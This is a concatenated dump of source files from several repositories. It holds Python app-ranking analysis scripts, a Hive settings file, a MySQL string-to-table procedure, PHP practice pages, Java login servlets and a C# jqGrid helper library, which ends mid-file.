import matplotlib.pyplot as plt
from internal.stores_dict import category_dict
from internal.stores_dict import market_dict
from internal.stores_dict import type_dict
from internal.stores_dict import country_dict
from public_company_apps import public_company_apps
def load_debug_files(debug_dir):
debug = pd.DataFrame(columns=['Store', 'Category', 'Feed', 'Start Date',
'End Date', 'Day', 'Week Day', 'App ID',
'Rank', 'Value', 'Included', 'AVG', 'Customize',
'Main Category', 'Publisher ID', 'Publisher Name',
'Release Date', 'Rank Link'])
for root, dirs, files in os.walk(debug_dir):
for f in files:
if 'debug_' in f and '.csv' in f:
fullpath = os.path.join(root, f)
df = pd.read_csv(fullpath)
if df.shape[0]>0:
debug = debug.append(df)
return debug
def plot_data_points(df, country, month, category=None, feed=None, dir=None):
df = df[df['Store'] == country]
if category is not None:
df = df[df['Category'] == category]
if feed is not None:
df = df[df['Feed'] == feed]
used = df[df['Included']=='T']
unused = df[df['Included']=='F']
public_debug = df[df['App ID'].isin(public_company_apps)]
public_used = public_debug[public_debug['Included']=='T']
public_unused = public_debug[public_debug['Included']=='F']
plt.clf()
ax = plt.subplot(111)
p1, = plt.plot(used['Rank'], used['Value'],'.', alpha=0.4)
p2, = plt.plot(unused['Rank'], unused['Value'],'.', alpha=0.4)
p3, = plt.plot(public_used['Rank'], public_used['Value'],'.', alpha=1.0)
p4, = plt.plot(public_unused['Rank'], public_unused['Value'], '.', alpha=1.0)
plt.legend([p1, p2, p3, p4], ['Total Used: %s'%used.shape[0],
'Total Unusued: %s'%unused.shape[0],
'Public Used: %s'%public_used.shape[0],
'Public Unused: %s'%public_unused.shape[0]])
ax.set_xscale('log')
ax.set_yscale('log')
plt.xlabel('Rank')
plt.ylabel('Value')
#plt.grid(True, which='both')
title= '%s_%s_%s_%s_Data_Points.png'%(month, country_dict[country], category_dict[category], feed)
plt.title(title)
plt.savefig('%s/%s'%(dir, title))
#plt.show()
def get_statistics(df, country=None, month=None):
if country is not None:
df = df[df['Store']==country]
public_df = df[df['App ID'].isin(public_company_apps)]
gdf = df.groupby(['Store', 'Rank'])
all_size = gdf.size()
all_size = all_size.reset_index().rename(columns={0:'all'})
gdf = df[df['Included']=='T'].groupby(['Store', 'Rank'])
used_size = gdf.size()
used_size = used_size.reset_index().rename(columns={0:'used all'})
gdf = public_df.groupby(['Store', 'Rank'])
public_size = gdf.size()
public_size = public_size.reset_index().rename(columns={0:'public'})
gdf = public_df[public_df['Included']=='T'].groupby(['Store', 'Rank'])
used_public_size = gdf.size()
used_public_size = used_public_size.reset_index().rename(columns={0:'used public'})
all_size = all_size.merge(used_size, on=['Store', 'Rank'], how='left')
all_size = all_size.merge(public_size, on=['Store', 'Rank'], how='left')
all_size = all_size.merge(used_public_size, on=['Store', 'Rank'], how='left')
all_size = all_size.fillna(0)
return all_size
if __name__ == '__main__':
debug = load_debug_files('/Users/perezrafael/appannie/aa/estimation/ios/')
debug = debug[debug['AVG'] == 'F']
month = '2012-07'
dir = '/Users/perezrafael/appannie/data_science/public_plots'
all_statistics = get_statistics(debug)
#all_statistics.to_csv('%s/stats.csv'%dir, index=False)
iterable = debug[['Store', 'Category', 'Feed']].drop_duplicates()
for index, series in iterable.iterrows():
country = series['Store']
category = series['Category']
feed = series['Feed']
plot_data_points(debug, country, month, category, feed, dir)<file_sep>/google-analytics/rincon_dump/outlier_exporter.py
import dill
import copy
import pandas as pd
import numpy as np
cntry_list = ['US','GB']
dev_list = ['iPhone','Android Mobile']
modelName = 'logLog'
for cntry in cntry_list:
for dev in dev_list:
# convert the strings to lists which can be iteratible
if type(cntry) == str:
cntry = [cntry]
if type(dev) == str:
dev = [dev]
print cntry, dev
fileObject = open('./class/{}/Rincon_Class_{}_{}.dill'.format(modelName, cntry[0], dev[0]), 'r')
new_class_ = dill.load(fileObject)
mdm_dat = pd.read_csv('../data/MDM_0118_AppNameAttached.csv')
mdm_dat['category_id'] = mdm_dat['category_id'].apply(int).apply(str)
val_data = mdm_dat[(mdm_dat['Country'].isin(cntry))
& (mdm_dat['Device Type'].isin(dev))
].copy()
fileObject.close()
new_class_[0].predict(val_data)
val_data['diff'] = val_data['final_pred'] - val_data['reporters_app']
val_data['diff%'] = val_data['final_pred'] / val_data['reporters_app'] - 1.0
val_data.sort('diff%', ascending=False).to_csv('./temp/{}/outlier_Diff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
val_data.sort('diff%', ascending=True).to_csv('./temp/{}/outlier_MinusDiff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
<file_sep>/evaluation/py/cv_filter.py
"""For each loop of estimation in CV, find the corresponding test samples and
pick them out.
"""
# Author: <NAME> <<EMAIL>>
import sys
import os
import os.path
import pickle
from collections import defaultdict
from optparse import OptionParser
import pandas as pd
def parse_options():
parser = OptionParser()
parser.add_option("-c", "--cvdir", dest="cv_dir",
help="Required. The directory which contains cross-validation index.")
(opts, args) = parser.parse_args()
return (opts, args)
def main():
(opts, args) = parse_options()
cv_index_dir = opts.cv_dir
est_dir = args[0]
output_dir = args[1]
cv_by_store = _read_and_group_cv_index_by_store(cv_index_dir)
# In est_dir, each sub-dir is named with the cv loop number.
#
# Each sub-dir contains the regular estimation file, and we need to pick the
# test samples out for each sub-dir.
df_by_filename = defaultdict(list)
for d in os.listdir(est_dir):
d_full_path = os.path.join(est_dir, d)
if os.path.isdir(d_full_path):
print(d_full_path)
kfold_index = int(d)
df_by_filename_sub = _filter_and_gather_subdir(d_full_path, cv_by_store, kfold_index)
# The corresponding est files in each sub-dir should have the same name
# We use the fact to merge them.
for (k, v) in df_by_filename_sub.iteritems():
df_by_filename[k].append(v)
# Concat the dfs and write into output file
for (filename, v) in df_by_filename.iteritems():
df = pd.concat(v)
df.to_csv(os.path.join(output_dir, filename), index=False)
def _read_and_group_cv_index_by_store(cv_index_dir):
"""
Arguments:
- `cv_index_dir`:
"""
pickle_names = filter(lambda s: s.endswith('pickle'), os.listdir(cv_index_dir))
groupby_store = {}
for name in pickle_names:
store = name.split('_')[0]
full_path = os.path.join(cv_index_dir, name)
obj = pickle.load(open(full_path, 'r'))
groupby_store[store] = obj
return groupby_store
def _filter_and_gather_subdir(d, cv_by_store, kfold_index):
est_files = filter(lambda s: s.endswith('.csv'), os.listdir(d))
# The corresponding est files in each sub-dir should have the same name
# We use the fact to merge them.
df_by_filename = {}
for f in est_files:
(store, unit) = f.split('_')[:2]
unit_key = 'downloads' if unit == 'Downloads' else 'sales'
full_path = os.path.join(d, f)
test_samples = set(map(int, cv_by_store[store][unit_key][kfold_index]))
df = pd.read_csv(full_path)
df = df[df['app_id'].isin(test_samples)]
df_by_filename[f] = df
return df_by_filename
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/audience/audience/__init__.py
__author__ = 'hgriffioen'
import paths
import plot
import predict
import weight
import itertools
import os
import pandas as pd
APP_ESTIMATES_FOLDER = 'out/estimates/'
def read_all_app_estimates(modality, iso_codes, platforms, bins, device_type='smartphone', folder=APP_ESTIMATES_FOLDER):
combinations = itertools.product(iso_codes, platforms)
estimates = pd.concat((read_app_estimates(modality, platform, iso_code, bins, device_type, folder)
for iso_code, platform in combinations),
axis=0, ignore_index=True)
return estimates
def read_app_estimates(modality, platform, iso_code, bins, device_type, folder=APP_ESTIMATES_FOLDER):
file_path = get_app_estimates_path(modality, platform, iso_code, bins, device_type, folder)
estimates = pd.read_csv(file_path)
return estimates
def get_app_estimates_path(modality, platform, iso_code, bins, device_type='smartphone', folder=APP_ESTIMATES_FOLDER):
file_name = '_'.join([modality, platform.lower(), iso_code] + bins + [device_type]) + '.csv'
file_path = os.sep.join((folder, file_name))
return file_path
<file_sep>/aa_au_model/hive_scripts/tools/settings.py
__author__ = 'cchang'
DATA_VERSION = 'v3.4.8'
STREAMING_JAR = '/home/hadoop/contrib/streaming/hadoop-streaming.jar'
EMR_KEY_PAIR_FILE = '/usr/local/sbin/ds-prod.pem'
S3_MNT_PREFIX = '/s3mnt-projecta'
S3_BIG_UPLOAD_BUCKET = 'aardvark-big-upload'
DATA_INT_S3_BUCKET = 'aardvark-prod-pdx-to-int-data'
DATA_S3_BUCKET = 'aardvark-prod-pdx-data'
DPI_RESULT_S3_BUCKET = 'aardvark-prod-pdx-ds-sample'
MDM_INTERFACE_S3_BUCKET = 'aardvark-prod-pdx-mdm-interface'
DEFAULT_START_DATE = '2014-10-23'
DEFAULT_SCHEMAS = {
'age_gender_survey_o.schema': [
{'table_type': 'VPN_GB', '$source': 'VPN', '$country': 'GB'},
{'table_type': 'VPN_US', '$source': 'VPN', '$country': 'US'},
{'table_type': 'VPN_JP', '$source': 'VPN', '$country': 'JP'},
{'table_type': 'MDM_ALL', '$source': 'MDM', '$country': 'ALL'}
],
'mdm_sample_guid_hash_o.schema': [],
'mdm_dim_operator_d.schema': [],
'mdm_dim_device_d.schema': [],
'mdm_dim_guid_d.schema': [],
'mdm_sample_app_screen_time_o.schema': [],
'mdm_sample_app_days_running_o.schema': [],
'mdm_sample_selected_device_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK'},
{'table_type': 'monthly', '$range_type': 'MONTH'}
],
'vpn_sample_data_connection_session_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_data_pause_resume_session_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_data_session_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_dpi_apps_o.schema': [],
'vpn_new_device_info_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_data_usage_model_active_users_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK', '$active_users_version': DATA_VERSION, '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$active_users_version': DATA_VERSION, '$country': 'US'}
],
'vpn_sample_usage_model_duration_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK', '$duration_version': DATA_VERSION, '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$duration_version': DATA_VERSION, '$country': 'US'}
],
'vpn_sample_usage_model_frequency_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK', '$frequency_version': DATA_VERSION, '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$frequency_version': DATA_VERSION, '$country': 'US'}
],
'vpn_sample_usage_model_selected_devices_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK', '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$country': 'US'}
]
}<file_sep>/int-vs-m-benchmark/sql/ios/1000a1-initialize-generic_string_list_to_table_procedure.sql
/*
DESCRIPTION:
general procedure to convert a string_list to a table
INPUT VARIABLES:
string_list, table_name and date_type
OUTPUT:
output table specified by table_name
REQUIRED PROCEDURES:
none
ALGORITHM STEPS:
1. create output table
2. insert string_list elements in output table
*/
DROP PROCEDURE IF EXISTS `generic_string_list_to_table_$process_id`;
delimiter $$
CREATE
PROCEDURE `generic_string_list_to_table_$process_id`(
IN `string_list` TEXT, -- string that represent list of several elements
IN `table_name` TEXT, -- name of the output table
IN `date_type` TEXT -- type of elements in output table
)
LANGUAGE SQL
DETERMINISTIC
MODIFIES SQL DATA
SQL SECURITY DEFINER
COMMENT ''
BEGIN
DECLARE iteration INT;
/*
1. create output table
*/
SET @prepare_drop_table_stmnt = CONCAT(
'DROP TEMPORARY TABLE IF EXISTS ',table_name);
PREPARE drop_table_stmnt FROM @prepare_drop_table_stmnt;
EXECUTE drop_table_stmnt;
SET @prepare_create_table_stmnt = CONCAT(
'CREATE TEMPORARY TABLE ',table_name,'(
id INT,
element ',date_type,',
CONSTRAINT PRIMARY KEY (id),
INDEX element_index (element))'
);
PREPARE create_table_stmnt FROM @prepare_create_table_stmnt;
EXECUTE create_table_stmnt;
/*
2. iterate over string_list and insert elements into output table
*/
IF not(string_list is null or string_list='') THEN
SET iteration = 1;
iteration_loop: LOOP
SET @prepare_insert_stmnt = CONCAT(
'INSERT INTO ',table_name,'
SELECT ',iteration,' as id, SUBSTRING_INDEX(SUBSTRING_INDEX(\'',string_list,'\',\',\',',iteration,'),\',\',-1)');
PREPARE insert_stmnt FROM @prepare_insert_stmnt;
EXECUTE insert_stmnt;
SET iteration = iteration + 1;
IF iteration > LENGTH(string_list) - LENGTH(REPLACE(string_list, ',', '')) + 1 THEN
LEAVE iteration_loop;
END IF;
END LOOP iteration_loop;
END IF;
END$$
delimiter ;
;
|
65b66154dd7d425ea1601251d9c89a8125e72450
|
[
"SQL",
"Markdown",
"INI",
"Python",
"Text",
"R",
"Shell"
] | 284
|
Shell
|
asutherland-aa/aa-data-science-alex-branch-test
|
16dead254d7ebedd056e1b508a73a81429093964
|
4e998ded625514ea749b1510dad21aa9a695b54d
|
refs/heads/master
|
<repo_name>chrisk3/php_misc<file_sep>/advanced2.php
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="description" content="A really awesome site!">
<title>PHP Assignment</title>
<link rel="stylesheet" href="advanced2.css">
</head>
<body>
<table>
<?php
// Write a program that generates an HTML table that looks like an 8x8 checkboard.
$row_cnt = 0;
$cell_cnt = 0;
for ($row = 1; $row < 9; $row++)
{
echo "<tr>";
for ($col = 1; $col < 9; $col++)
{
if ($cell_cnt % 2 == $row_cnt % 2)
{
echo "<td class='red'></td>";
}
else
{
echo "<td class='black'></td>";
}
$cell_cnt += 1;
}
echo "</tr>";
$row_cnt += 1;
}
?>
</table>
</body>
</html>
<file_sep>/advanced1.php
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="description" content="A really awesome site!">
<title>PHP Assignment</title>
<link rel="stylesheet" href="advanced1.css">
</head>
<body>
<table>
<thead>
<th>User #</th>
<th>First Name</th>
<th>Last Name</th>
<th>Full Name</th>
<th>Full Name in Upper Case</th>
<th>Length of Name</th>
</thead>
<tbody>
<?php
// Create a program that outputs an HTML table given a multidimensional, associative array
$users = array(
array('first_name' => 'Michael', 'last_name' => ' Choi '),
array('first_name' => 'John', 'last_name' => 'Supsupin'),
array('first_name' => 'Mark', 'last_name' => ' Guillen'),
array('first_name' => 'KB', 'last_name' => 'Tonel'),
array('first_name' => 'Chris', 'last_name' => 'Kaundart'),
array('first_name' => 'Dexter', 'last_name' => 'Clark'),
array('first_name' => 'Aaron', 'last_name' => 'Young'),
array('first_name' => 'Dan', 'last_name' => 'Basinski'),
array('first_name' => 'Randall', 'last_name' => 'Frisk'),
array('first_name' => 'Matt', 'last_name' => 'Barkley'),
array('first_name' => 'Andrew', 'last_name' => 'Luck'),
array('first_name' => 'Dennis', 'last_name' => 'Dixon'),
array('first_name' => 'Nick', 'last_name' => 'Foles'),
array('first_name' => 'Marcus', 'last_name' => 'Mariota'),
array('first_name' => 'Kevin', 'last_name' => 'Hogan')
);
$id = 1;
foreach ($users as $user) {
$first = trim($user['first_name']);
$last = trim($user['last_name']);
$full = $first . " " . $last;
echo "<tr";
if ($id % 5 == 0) {
echo " class='bg'";
}
echo "><td>" . $id . "</td>";
foreach ($user as $key => $value) {
trim($value);
echo "<td>" . $value . "</td>";
}
echo "<td>" . $full . "</td>";
echo "<td>" . strtoupper($full) . "</td>";
echo "<td>" . strlen($full) . "</td>";
echo "</tr>";
$id += 1;
}
?>
</tbody>
</table>
</body>
</html>
|
5c8b455ba6f6a08b188e863b967dfa4f388e24c7
|
[
"PHP"
] | 2
|
PHP
|
chrisk3/php_misc
|
334e9e0545b3efbde861ceb3c8359c96c49ee0a9
|
846c5590289b9191e7c734efaf8486f493a0ff2d
|
refs/heads/master
|
<repo_name>fengbujues/BlogTestProjectByJSP<file_sep>/src/org/blog/controller/registServlet.java
package org.blog.controller;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
@WebServlet("/regist/*")
public class registServlet extends BaseServlet {
public void test(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
System.out.println("执行registservlet的test方法");
}
public void regist(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
System.out.println("执行registservlet的regist方法");
}
}
<file_sep>/src/org/blog/controller/adminServlet.java
package org.blog.controller;
import org.blog.dao.daoimpl.AdminDAOImp;
import org.blog.entity.Admin;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.io.PrintWriter;
import java.sql.*;
@WebServlet("/adminServlet")
public class adminServlet extends javax.servlet.http.HttpServlet {
private AdminDAOImp daoImp=null;
@Override
public void init() throws ServletException {
daoImp = new AdminDAOImp();
}
protected void doPost(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
String mothed = request.getParameter("mothed");
StringBuffer url = request.getRequestURL();
System.out.println("访问地址:"+url);
String queryString = request.getQueryString();
System.out.println("附加参数:"+queryString);
login(request,response);
System.out.println("登陆:"+mothed);
// switch (mothed){
// case "login":login(request,response);break;
// }
}
protected void doGet(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
doPost(request,response);
}
protected void login(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
String username = (String) request.getParameter("username");
String password = (String) request.getParameter("password");
Admin admin = daoImp.login(username, password);
PrintWriter writer = response.getWriter();
if (admin!=null){
writer.print("true");
HttpSession session = request.getSession();
session.setAttribute("admin",admin);
response.sendRedirect("views/homepage.jsp");
}else{
writer.print("false");
}
writer.flush();
writer.close();
// daoImp.closeAll();
}
}
|
74e1580dd2c76db0edfc73ea2873597ac323d134
|
[
"Java"
] | 2
|
Java
|
fengbujues/BlogTestProjectByJSP
|
4136735f4994b163006db594df14978336a11d88
|
9c5743e58d2a3d93e55c8e29b5d584a9785abbd0
|
refs/heads/develop
|
<file_sep>/****************************************************
** ���ߣ� Halower (QQ:121625933)
** ��ʼʱ�䣺2015-02-01
** ������jqGrid��չö��
*****************************************************/
using System;
namespace HalowerHub.JqGrid
{
[Flags]
public enum GridOperators
{
Add = 1,
Edit = 2,
Delete = 4,
Search = 16,
Refresh = 32
}
}<file_sep>namespace HalowerHub.JqGrid
{
public enum CellFormatters
{
Integer,
Number,
Currency,
Date,
Email,
Showlink,
Checkbox
}
}
<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展枚举
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum Driections
{
Ltr,
Rtl
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-03-21
** 描述:jqGrid分页参数
*****************************************************/
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
public class PageParams
{
public int PageIndex { get; set; }
public int PageSize { get; set; }
public string Gridkey { get; set; }
public string SortName { get; set; }
public string Displayfileds { get; set; }
public string SearchField { get; set; }
public string SearchString { get; set; }
public string SearchOper { get; set; }
public string Filters { get; set; }
public string Sord { get; set; }
}
public static class RequestHelper
{
public static PageParams InitRequestParams(Controller baseContent)
{
var pageParams = new PageParams
{
PageIndex = int.Parse(baseContent.Request["page"] ?? "0"),
PageSize = int.Parse(baseContent.Request["rows"] ?? "0"),
SortName = baseContent.Request["sidx"],
Displayfileds = baseContent.Request["displayfileds"],
SearchField = baseContent.Request["searchField"],
SearchString = baseContent.Request["searchString"],
SearchOper = baseContent.Request["searchOper"],
Filters = baseContent.Request["filters"],
Sord = baseContent.Request["sord"],
Gridkey = baseContent.Request["gridKey"]
};
return pageParams;
}
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class ColSPanConfiguation
{
[JsonProperty("useColSpanStyle")]
public bool UseColSpanStyle
{
get; set;
}
[JsonProperty("groupHeaders")]
public GroupHeader[] GroupHeaders { get; set; }
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展
**修改时间: 2015-08-22
*****************************************************/
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Diagnostics;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Web;
using RazorEngine;
using RazorEngine.Configuration;
using RazorEngine.Templating;
using RazorEngine.Text;
namespace HalowerHub.JqGrid
{
public class GridGenerator<T> : IHtmlString
{
#region 属性
private GridConfiguration GridConfiguration { get; }
#endregion
#region 构造函数
public GridGenerator()
{
GridConfiguration = new GridConfiguration();
}
public GridGenerator(string gridId)
: this()
{
_gridId = gridId;
}
public GridGenerator(string gridId, GridConfiguration gridConfiguration)
: this(gridId)
{
GridConfiguration = gridConfiguration;
}
#endregion
#region 字段
private readonly string _gridId;
#endregion
#region 主要方法
/// <summary>
/// 启用分页
/// </summary>
/// <param name="pagerId">分页控件Id</param>
/// <param name="hasPager"></param>
/// <returns></returns>
public GridGenerator<T> Pager(string pagerId = null, bool hasPager = true)
{
if (GridConfiguration.SubGridRowExpanded != null)
throw new Exception("子表格不需要指定pagerId");
GridConfiguration.PagerId = hasPager ? pagerId ?? "pagerId" : null;
return this;
}
/// <summary>
/// 获取数据的地址
/// </summary>
/// <param name="postUrl">获取数据的地址</param>
/// <param name="postData">发送参数数据</param>
/// <param name="tabKeyName">主键</param>
/// <returns></returns>
public GridGenerator<T> Url(string postUrl, Dictionary<string, string> postData = null, string tabKeyName = null)
{
GridConfiguration.Url = postUrl;
if (tabKeyName != null)
{
postUrl = tabKeyName == "row_id" ? postUrl + "/" : postUrl + "?" + tabKeyName + "=";
GridConfiguration.Url = postUrl + $"{"\""}+{"row_id"}&";
}
if (postData == null)
{
postData = new Dictionary<string, string>();
}
postData.Add("displayFileds", string.Join(",", GridConfiguration.GridColumns.Select(c => c.Field).Where(f => !string.IsNullOrEmpty(f))));
if (string.IsNullOrEmpty(GridConfiguration.GridKey))
throw new Exception("请指定表格标识列");
postData.Add("gridkey", GridConfiguration.GridKey);
GridConfiguration.PostData = postData;
return this;
}
/// <summary>
/// 获取数据
/// </summary>
/// <param name="postUrl">获取数据的地址</param>
/// <param name="tabKname">主表主键</param>
/// <param name="postData">发送参数数据</param>
/// <param name="passPTabKey">是否传入父表主键参数</param>
/// <returns></returns>
public GridGenerator<T> Url(string postUrl, bool passPTabKey, string tabKname, Dictionary<string, string> postData = null)
{
return passPTabKey ? Url(postUrl, postData, tabKname ?? "row_id") : Url(postUrl, postData);
}
/// <summary>
/// 获取数据
/// </summary>
/// <param name="postUrl">获取数据的地址</param>
/// <param name="passPTabKey">是否传入父表主键参数</param>
public GridGenerator<T> Url(string postUrl, bool passPTabKey)
{
return Url(postUrl, passPTabKey, null);
}
/// <summary>
/// 获取数据
/// </summary>
/// <param name="editUrl">提交数据的地址</param>
public GridGenerator<T> EditUrl(string editUrl)
{
GridConfiguration.EditUrl = editUrl;
return this;
}
/// <summary>
/// 表格名称
/// </summary>
/// <param name="caption">表格名称</param>
/// <returns></returns>
public GridGenerator<T> Caption(string caption)
{
GridConfiguration.Caption = caption;
return this;
}
/// <summary>
/// 一个下拉选择框,用来改变显示记录数,当选择时会覆盖rowNum参数传递到后台
/// </summary>
/// <param name="rowslist">显示记录数</param>
/// <returns></returns>
public GridGenerator<T> RowList(params int[] rowslist)
{
GridConfiguration.RowList = rowslist;
return this;
}
/// <summary>
/// 默认的排序列。可以是列名称或者是一个数字,这个参数会被提交到后台
/// </summary>
/// <param name="sortName">排序列</param>
/// <returns></returns>
public GridGenerator<T> SortName(string sortName)
{
GridConfiguration.SortName = sortName;
return this;
}
/// <summary>
/// 表格中的书写方向
/// </summary>
/// <param name="direction">书写方向</param>
/// <returns></returns>
public GridGenerator<T> Direction(Driections direction)
{
GridConfiguration.Direction = direction.ToString().ToLower();
return this;
}
/// <summary>
/// 从服务器读取XML或JSON数据时初始的排序类型
/// </summary>
/// <param name="sortOrderType">排序类型</param>
/// <returns></returns>
public GridGenerator<T> SortOrder(SortOrders sortOrderType = SortOrders.Desc)
{
GridConfiguration.Sortorder = sortOrderType.ToString().ToLower();
return this;
}
/// <summary>
/// 数据请求和排序时显示的文本
/// </summary>
/// <param name="loadtext">显示的文本</param>
/// <returns></returns>
public GridGenerator<T> LoadText(string loadtext)
{
GridConfiguration.LoadText = loadtext;
return this;
}
/// <summary>
/// 定义导航栏是否有页码输入框
/// </summary>
/// <param name="haspginput">是否有页码输入框</param>
/// <returns></returns>
public GridGenerator<T> PgInput(bool haspginput = true)
{
GridConfiguration.PgInput = haspginput;
return this;
}
/// <summary>
/// 当设置为true时,表格宽度将自动匹配到父元素的宽度
/// </summary>
/// <param name="autowidth">自动匹配</param>
/// <returns></returns>
public GridGenerator<T> AutoWidth(bool autowidth = true)
{
GridConfiguration.AutoWidth = autowidth;
return this;
}
/// <summary>
/// 当设置为true时,对来自服务器的数据和提交数据进行encodes编码。如<![CDATA[<将被转换为<]]>
/// </summary>
/// <param name="autoEncode">encodes编码</param>
/// <returns></returns>
public GridGenerator<T> AutoEencode(bool? autoEncode)
{
GridConfiguration.AutoEencode = autoEncode;
return this;
}
/// <summary>
/// 表格完成事件
/// </summary>
/// <param name="gridCompleteFunc"></param>
/// <returns></returns>
public GridGenerator<T> GridComplete(string gridCompleteFunc)
{
GridConfiguration.GridComplete = "&"+ gridCompleteFunc + "&";
return this;
}
/// <summary>
/// 行选择事件
/// </summary>
/// <param name="onSelectRowFunc"></param>
/// <returns></returns>
public GridGenerator<T> OnSelectRow(string onSelectRowFunc)
{
GridConfiguration.OnSelectRow = "&" + onSelectRowFunc + "&";
return this;
}
/// <summary>
/// 所有行选中
/// </summary>
/// <param name="onSelectAllFunc"></param>
/// <returns></returns>
public GridGenerator<T> OnSelectAll(string onSelectAllFunc)
{
GridConfiguration.OnSelectAll = "&" + onSelectAllFunc + "&";
return this;
}
/// <summary>
/// 定义表格希望获得的数据的类型
/// </summary>
/// <param name="dataTypes">数据的类型</param>
/// <returns></returns>
public GridGenerator<T> DataType(ResponseDatas dataTypes)
{
GridConfiguration.DataType = dataTypes.ToString().ToLower();
return this;
}
/// <summary>
/// 当返回(或当前)数量为零时显示的信息此项只用当viewrecords 设置为true时才有效。
/// </summary>
/// <param name="emptyrecords">数量为零时显示的信息</param>
/// <returns></returns>
public GridGenerator<T> EmptyRecords(string emptyrecords)
{
GridConfiguration.EmptyRecords = emptyrecords;
return this;
}
/// <summary>
/// 表格高度。可为数值、百分比或auto
/// </summary>
/// <param name="height">高度</param>
/// <returns></returns>
public GridGenerator<T> Height(string height)
{
GridConfiguration.Height = height;
return this;
}
/// <summary>
/// 此属性设为true时启用多行选择,出现复选框
/// </summary>
/// <param name="multiselect">出现复选框</param>
/// <returns></returns>
public GridGenerator<T> Multiselect(bool multiselect = true)
{
GridConfiguration.Multiselect = multiselect;
return this;
}
/// <summary>
/// 子表数据请求Url
/// </summary>
/// <param name="url">数据请求Url</param>
/// <param name="gridKey">gridKey</param>
/// <returns></returns>
public GridGenerator<T> SubGridUrl(string url, string gridKey)
{
GridConfiguration.SubGrid = true;
var displayFileds = string.Join(",", GridConfiguration.SubGridModel[0].GridColumns.Select(c => c.Field).Where(f => !string.IsNullOrEmpty(f)));
if (!url.Contains("?") && !url.EndsWith("\\") && string.IsNullOrEmpty(GridConfiguration.SubGridRowExpanded))
GridConfiguration.SubGridUrl = url + "?gridKey=" + gridKey + "&displayfileds=" + displayFileds;
return this;
}
/// <summary>
/// 子表格列配置
/// </summary>
/// <param name="gridColumns">有效列</param>
/// <returns></returns>
public GridGenerator<T> MainGrid(params IGridColumn[] gridColumns)
{
GridConfiguration.GridColumns = gridColumns.ToList();
return this;
}
/// <summary>
/// 子表格列配置
/// </summary>
/// <param name="multisearh">开启高级查询</param>
/// <returns></returns>
public GridGenerator<T> MultiSearch(bool multisearh = true)
{
GridConfiguration.MultiSearch = multisearh;
return this;
}
/// <summary>
/// 子表格配置
/// </summary>
/// <param name="gridColumns">有效列</param>
/// <returns></returns>
public GridGenerator<T> SubGrid(params GridColumn[] gridColumns)
{
GridConfiguration.SubGridModel = new[] { new SubGridTable(gridColumns) };
return this;
}
/// <summary>
/// 子表格配置
/// </summary>
/// <param name="gridTable">子表格</param>
/// <param name="hassubPager"></param>
/// <returns></returns>
public GridGenerator<T> SubGridAsGrid(GridGenerator<T> gridTable, bool hassubPager = false)
{
GridConfiguration.SubGrid = true;
var sb = new StringBuilder("&function(subgrid_id, row_id){");
sb.Append("var subgrid_pager_id=subgrid_id + '_pgr';");
sb.Append("var subgrid_table_id = subgrid_id+'_t';");
sb.Append($"jQuery('#'+subgrid_id).html(\"<table id='\" + subgrid_table_id + \"'class='scroll'></table>{(hassubPager ? "<div id='\" + subgrid_pager_id + \"'class='scroll'></div>" : "")}\");");
sb.Append("jQuery('#'+subgrid_table_id).jqGrid(");
sb.Append(gridTable.GridConfiguration.IgnoreNullSerialize());
sb.Append(" pager: subgrid_pager_id");
sb.Append(" });}&");
GridConfiguration.SubGridRowExpanded = sb.ToString()
.Replace("\"&", "")
.Replace("&\"", "")
.Replace("} pager:", ", pager:");
return this;
}
/// <summary>
/// 填充表单
/// </summary>
/// <param name="url">请求地址</param>
/// <param name="pTabKeyName">主表key</param>
/// <returns></returns>
